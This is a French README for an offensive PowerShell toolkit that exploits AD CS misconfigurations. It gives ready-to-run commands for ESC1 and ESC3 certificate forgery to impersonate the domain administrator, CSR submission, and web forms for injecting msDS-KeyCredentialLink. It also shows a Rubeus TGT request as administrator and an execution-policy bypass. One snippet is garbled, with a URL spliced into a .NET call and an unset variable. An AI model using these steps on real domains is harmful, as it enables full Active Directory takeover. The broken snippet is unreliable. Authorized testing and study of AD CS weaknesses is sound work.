
AD CS : tout ce qui concerne l'exploitation s'y trouve
Certi-Bhai est une collection complète d'outils d'exploitation PowerShell pour attaquer les vulnérabilités des services de certificats Active Directory (AD CS). Cet outil implémente divers scénarios d'escalade (ESC) qui démontrent des erreurs de configuration de sécurité critiques dans les environnements ADCS.
Les services de certificats Active Directory (AD CS) sont souvent mal configurés, créant de multiples vecteurs d'attaque. Certi-Bhai fournit des scripts d'exploitation pratiques et des utilitaires pour les tests de sécurité et la recherche sur les vulnérabilités ADCS courantes.
À utiliser de manière responsable et uniquement dans des environnements de test autorisés.
# Module Active Directory (facultatif, pour des fonctionnalités améliorées)
Import-Module ActiveDirectory
Vulnérabilité : Les modèles de certificat permettent l'inscription avec des valeurs SubjectAltName (SAN) arbitraires.
Ce qu'il fait : Crée un certificat signé par un modèle trop permissif, vous permettant d'usurper n'importe quel utilisateur ou ordinateur du domaine.
Utilisation :
# Accédez au répertoire ESC1
cd ESC1
# Exécutez le script d'exploitation
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
-templateName "vuln" `
-altName "administrator" `
-pfxPass "password123"
Paramètres :
-subjectName : Nom distinctif complet (DN) de l'utilisateur cible-templateName : Nom du modèle de certificat vulnérable-altName : Nom alternatif à demander (nom d'utilisateur/ordinateur)-pfxPass : Mot de passe pour l'exportation PFXSortie : Certificat PFX encodé en Base64 pour une utilisation avec des outils comme Rubeus
Tutoriel vidéo : https://www.youtube.com/watch?v=l0gMw_mO4dw
Vulnérabilité : Les agents de demande de certificat peuvent demander des certificats au nom de n'importe quel utilisateur.
Ce qu'il fait : Inscrit un certificat en tant qu'agent de demande de certificat, puis demande des certificats pour des entités arbitraires.
Utilisation :
# Accédez au répertoire ESC3
cd ESC3
# Exécutez le script d'exploitation
.
\esc3_working.ps1 -templateName "CEOTemplate" `
-target_user "administrator" `
-domain "INDISHELL" `
-pfxPass "password123"
Paramètres :
-templateName : Modèle d'agent de demande vulnérable-target_user : Entité pour laquelle demander le certificat-domain : Nom du domaine-pfxPass : Mot de passe PFXSortie : Certificat administrateur (PFX) avec encodage base64
Tutoriel vidéo : https://www.youtube.com/watch?v=fGjrM-JKnoM
Vulnérabilité : Injection de stratégie d'application.
cd CSR_Generate
# Générez une demande de signature de certificat
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
-altName "admin"
# Soumettez le CSR à l'AC
.
\csr_submit.ps1 -csr $csr `
-templateName "User" `
-caServer "ca-server.domain.local"
L'interface Web cert.aspx fournit un formulaire convivial pour demander un certificat auprès du point de terminaison RPC AD CS :
http://your-iis-server/cert.aspx
Modifiez les attributs LDAP via l'interface Web. Ce script est principalement utilisé pour injecter un blob dans l'attribut msDS-KeyCredentialLink :
http://your-iis-server/ldap_update.aspx
Fonctionnalités :
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
-templateName "User" `
-altName "administrator" `
-pfxPass "P@ssw0rd!"
# Convertissez le PFX dans un format utilisable pour Rubeus
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap
Q : L'exécution du script est bloquée
# Exécutez PowerShell en tant qu'administrateur
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Q : Modèle de certificat introuvable
Q : La connexion LDAP échoue
Vous avez trouvé un problème ou avez des améliorations ? Veuillez le signaler de manière responsable.